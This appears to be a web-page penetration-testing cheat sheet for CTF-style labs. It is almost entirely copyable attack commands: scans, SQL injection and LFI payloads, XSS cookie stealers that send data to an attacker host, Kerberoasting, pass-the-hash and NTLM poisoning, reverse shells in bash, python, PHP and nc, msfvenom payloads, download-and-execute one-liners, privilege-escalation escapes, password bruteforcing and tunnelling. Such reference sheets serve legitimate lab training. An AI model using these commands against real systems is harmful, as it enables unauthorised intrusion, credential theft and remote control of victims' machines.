⌕
showing — commands
01
Recon & Scanning
Nmap — Essential Scans
$nmap -sC -sV -oN scan.txt <IP>default scripts + version, save outputcopy
$nmap -p- --min-rate 5000 -T4 <IP>all 65535 ports, fastcopy
$nmap -sU --top-ports 100 <IP>UDP top 100copy
$nmap -sV --script vuln <IP>vulnerability detection scriptscopy
$nmap -Pn -sV -sC -p 22,80,443,445,5985 <IP>no ping, targeted portscopy
$nmap -sn 10.10.10.0/24ping sweep / host discoverycopy
tip: do full port scan first (-p-), then version scan only open ports for speed
Dir / Vhost Bruteforce
$gobuster dir -u http://<IP> -w common.txtbasic dir scancopy
$gobuster dir -u http://<IP> -w raft-medium.txt -x php,html,txt,bakwith extensionscopy
$gobuster vhost -u http://target.htb -w subdomains.txt --append-domainvhost enumcopy
$ffuf -w subdomains.txt -u http://FUZZ.target.htb -fs 0subdomain fuzz, filter emptycopy
$ffuf -w params.txt -u 'http://target/page?FUZZ=val'GET param fuzzingcopy
$feroxbuster -u http://<IP> -w common.txt --depth 3recursive scancopy
DNS & Fingerprinting
$dig ANY target.htb @<IP>all DNS recordscopy
$dig axfr target.htb @<IP>zone transfercopy
$whatweb -a 3 http://<IP>aggressive web fingerprintcopy
$nikto -h http://<IP>web vuln scancopy
$curl -I http://<IP>grab HTTP headerscopy
02
Web Exploitation
SQL Injection
$sqlmap -u 'http://target/?id=1' --dbsenumerate databasescopy
$sqlmap -u URL -D db -T users --dumpdump tablecopy
$sqlmap -r req.txt --level 5 --risk 3from Burp request filecopy
$sqlmap -u URL --os-shellattempt OS shell via SQLicopy
manual: ' OR 1=1-- - | ' AND SLEEP(5)-- - | ' UNION SELECT null,null-- -
LFI / Path Traversal
?page=../../../../etc/passwdbasic traversalcopy
?page=....//....//....//etc/passwdfilter bypasscopy
?page=php://filter/convert.base64-encode/resource=index.phpread PHP sourcecopy
?page=../../../../windows/system32/drivers/etc/hostsWindows targetcopy
?page=\\<ATTACKER>\share\xUNC → NTLMv2 capturecopy
rce via LFI: try /proc/self/environ, access.log poison, or SSH auth.log
File Upload Bypass
shell.php → shell.pHp / shell.php5 / shell.phtmlcase/alt extension bypasscopy
shell.php → shell.php.jpgdouble extensioncopy
Content-Type: image/jpeg # swap in BurpMIME type bypasscopy
$exiftool -Comment='<?php system($_GET["cmd"]); ?>' img.jpgPHP in image metadatacopy
XSS & SSRF
<script>fetch('http://<IP>/?c='+document.cookie)</script>cookie stealercopy
<img src=x onerror=this.src='http://<IP>/?'+btoa(document.cookie)>img tag XSScopy
http://169.254.169.254/latest/meta-data/SSRF → AWS metadatacopy
http://localhost:<port>/adminSSRF → internal servicescopy
$nc -lvnp 80 # catch XSS/SSRF requestscopy
03
SMB / Active Directory
SMB Enumeration
$smbclient -L //<IP> -Nlist shares (null auth)copy
$smbclient //<IP>/share -U userconnect to sharecopy
$crackmapexec smb <IP> -u user -p pass --shareslist shares authedcopy
$crackmapexec smb <IP> -u users.txt -p 'Pass123!' --continue-on-successspraycopy
$enum4linux-ng -A <IP>full enum (users, shares, policies)copy
$smbmap -H <IP> -u anonymouscheck permissionscopy
Kerberos Attacks
$kerbrute userenum -d domain.local --dc <IP> users.txtvalidate usernamescopy
$impacket-GetUserSPNs domain/user:pass -dc-ip <IP> -requestKerberoastingcopy
$impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip <IP>AS-REP roastingcopy
$impacket-secretsdump domain/user:pass@<IP>dump hashescopy
$evil-winrm -i <IP> -u user -p passWinRM shellcopy
$evil-winrm -i <IP> -u user -H <NTLM-hash>pass-the-hashcopy
BloodHound Collection
$bloodhound-python -d domain.local -u user -p pass -ns <IP> -c allcollect allcopy
$ldapsearch -x -H ldap://<IP> -b 'DC=domain,DC=local'LDAP anon enumcopy
cypher: MATCH (u:User {owned:true})-[r:MemberOf|AdminTo*1..]->(g:Group) RETURN u,r,g
NTLMv2 Capture
$responder -I tun0 -rdwLLMNR/NBT-NS poisoningcopy
$hashcat -m 5600 hash.txt rockyou.txtcrack NTLMv2copy
$hashcat -m 1000 hash.txt rockyou.txtcrack NTLMcopy
trigger: inject \\<IP>\share via LFI, XSS, or UNC path to capture without LLMNR
04
Shells & Payloads
Reverse Shells — Linux
$rlwrap nc -lvnp 4444listener (rlwrap = arrow keys)copy
bash -c 'bash -i >& /dev/tcp/<IP>/4444 0>&1'bash TCPcopy
python3 -c "import os,pty,socket;s=socket.socket();s.connect(('<IP>',4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn('/bin/bash')"python3copy
php -r '$s=fsockopen("<IP>",4444);exec("/bin/bash -i <&3 >&3 2>&3");'PHPcopy
nc <IP> 4444 | /bin/bash | nc <IP> 4445nc without -ecopy
Shell Stabilization (TTY)
$python3 -c 'import pty;pty.spawn("/bin/bash")'step 1: upgrade to PTYcopy
Ctrl+Z → stty raw -echo; fgstep 2: raw modecopy
$export TERM=xterm; stty rows 50 columns 200step 3: fix terminal sizecopy
alternative: use socat for fully interactive TTY from the start — cleaner
Windows Payloads
$msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o shell.exex64 execopy
$msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f aspx -o shell.aspxASPXcopy
certutil -urlcache -f http://<IP>/shell.exe shell.exedownload via certutilcopy
powershell "IEX(New-Object Net.WebClient).DownloadString('http://<IP>/shell.ps1')"PS download+execcopy
05
Privilege Escalation
Linux Enum
$sudo -lwhat can we sudo?copy
$find / -perm -u=s -type f 2>/dev/nullSUID binariescopy
$cat /etc/crontab; ls /etc/cron*cron jobscopy
$ss -tulnplistening ports (internal services)copy
$curl http://<IP>/linpeas.sh | bashrun LinPEAScopy
$cat /etc/passwd | grep bashusers with shellscopy
GTFOBins Escapes
# vim
sudo vim -c ':!/bin/bash'vim escapecopy
# find (SUID)
find . -exec /bin/bash -p \;SUID find escapecopy
# python / awk / nmap
sudo python3 -c 'import os;os.system("/bin/bash")'python escapecopy
sudo awk 'BEGIN{system("/bin/bash")}'awk escapecopy
gtfobins.github.io — escape techniques for every binary
Windows PrivEsc
>whoami /privcurrent privilegescopy
>net user; net localgroup administratorsusers and adminscopy
>schtasks /query /fo LIST /vscheduled taskscopy
$iwr http://<IP>/winpeas.exe -OutFile wp.exe; .\wp.exeWinPEAScopy
SeImpersonatePrivilege → JuicyPotato / PrintSpoofer / GodPotato
06
Hashes & Credentials
Hashcat Modes
$hashcat -m 0 hash.txt rockyou.txtMD5copy
$hashcat -m 100 hash.txt rockyou.txtSHA1copy
$hashcat -m 1000 hash.txt rockyou.txtNTLMcopy
$hashcat -m 5600 hash.txt rockyou.txtNTLMv2copy
$hashcat -m 13100 hash.txt rockyou.txtKerberoast TGScopy
$hashcat -m 18200 hash.txt rockyou.txtAS-REP roastcopy
$hashcat -m 1800 hash.txt rockyou.txtsha512crypt ($6$)copy
$hashcat -m 3200 hash.txt rockyou.txtbcryptcopy
$hashid '$hash'identify hash typecopy
Hydra Bruteforce
$hydra -l admin -P rockyou.txt ssh://<IP>SSHcopy
$hydra -l admin -P rockyou.txt ftp://<IP>FTPcopy
$hydra -l admin -P rockyou.txt <IP> http-post-form "/login:user=^USER^&pass=^PASS^:F=invalid"HTTP formcopy
$hydra -L users.txt -P pass.txt -t 4 smb://<IP>SMBcopy
07
File Transfer
Serve Files (Attacker)
$python3 -m http.server 80quick HTTP servercopy
$impacket-smbserver share . -smb2supportSMB sharecopy
$nc -lvnp 4444 < file.txtsend via nccopy
Download Files (Victim)
$wget http://<IP>/file -O /tmp/filewgetcopy
$curl http://<IP>/file -o /tmp/filecurlcopy
copy \\<IP>\share\file.exe .Windows: SMB copycopy
$cat file | base64; echo "---"; echo b64 | base64 -dbase64 exfilcopy
08
Pivoting & Tunneling
SSH Tunnels
$ssh -L 8080:127.0.0.1:80 user@<IP>local forward: :8080 → victim:80copy
$ssh -R 4444:127.0.0.1:4444 user@<ATTACKER>remote port forwardcopy
$ssh -D 1080 user@<IP>dynamic SOCKS proxycopy
$proxychains nmap -sT -Pn 10.10.10.0/24scan via proxycopy
Chisel
$# attacker
$./chisel server -p 8000 --reversestart servercopy
$# victim
$./chisel client <ATTACKER>:8000 R:socksreverse SOCKS5copy
$./chisel client <ATTACKER>:8000 R:80:127.0.0.1:80forward portcopy
then: set proxychains to socks5 127.0.0.1 1080 in /etc/proxychains4.conf
⌕
no commands matching that search